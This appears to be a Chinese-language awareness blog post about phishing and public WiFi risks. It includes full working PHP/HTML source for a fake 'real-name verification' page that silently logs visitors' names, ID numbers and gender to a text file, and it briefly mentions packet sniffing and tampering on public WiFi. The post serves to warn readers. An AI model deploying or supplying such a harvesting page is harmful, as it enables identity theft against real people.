很多人都聽說過什麼“打擊網絡犯罪”,“小心上鉤”之類的。但是大家有沒有想過,在喊這些口號的同時,你已經“上鉤了”。
第一個就是你可能經常會下載一下XX東西,這時,網站說要登錄賬戶什麼的,你發現你又沒有賬號。網站突然有跳出來了一個可以使用第三方登錄的界面。假如是QQ,你不小心輸了真實的號碼和密碼,這時,別人就會記錄你輸的內容,進行盜號。特別是實名認證網站要是作假,那你就完了。這裏我就拿PHP寫一個網站私自記錄信息的腳本。
<!DOCTYPE html>
<html>
<title>釣魚網頁實例</title>
<body>
<h1>--------------實名認證系統-------------- <h1>
<h5> <h5>
<form name="a" method="post">
<table width="200" border="1">
<tr>
<th scope="row">真實姓名</th>
<td><input type="text" name="a"/></td>
<td> </td>
</tr>
<tr>
<th scope="row">身份證號碼</th>
<td><input type="text" name="b"/></td>
<td> </td>
</tr>
<tr>
<th scope="row">性別</th>
<td>男<input type="radio" name="c" value="男" />女<input type="radio" name="c" value="女" /></td>
<td><input type="submit" name="submit" value="提交"</td>
</tr>
</table>
</form>
<?php
$name=$_POST['a'];
$u=$_POST['b'];
$x=$_POST['c'];
$b="姓名:$name 身份證號碼: $u 性別: $x \r\n";
file_put_contents ( 'name.txt', " $b " , FILE_APPEND );
?>
</body>
</html>
通過這段代碼,記錄者就可以把你的性別,名字,身份證號記錄的name.txt裏。真要的話,還會加上CSS,JavaScript和圖片。如果不看網頁源代碼的話,誰也不知道那是真的還是假的。這個腳本里實際起作用的只有7行代碼,就是
<?php
$name=$_POST['a'];
$u=$_POST['b'];
$x=$_POST['c'];
$b="姓名:$name 身份證號碼: $u 性別: $x \r\n";
file_put_contents ( 'name.txt', " $b " , FILE_APPEND );
?>
第二個就是公共場合寧肯浪費流量也不要連WIFI。因爲公共場合了公共WIFI風險非常大。拿一個抓包軟件,就可以輕輕鬆鬆抓到你的賬號密碼之類的。甚至有時可以拿軟件進行改包,連安全的也變成危險的了。
本期就到這裏了。下期會不定時發表。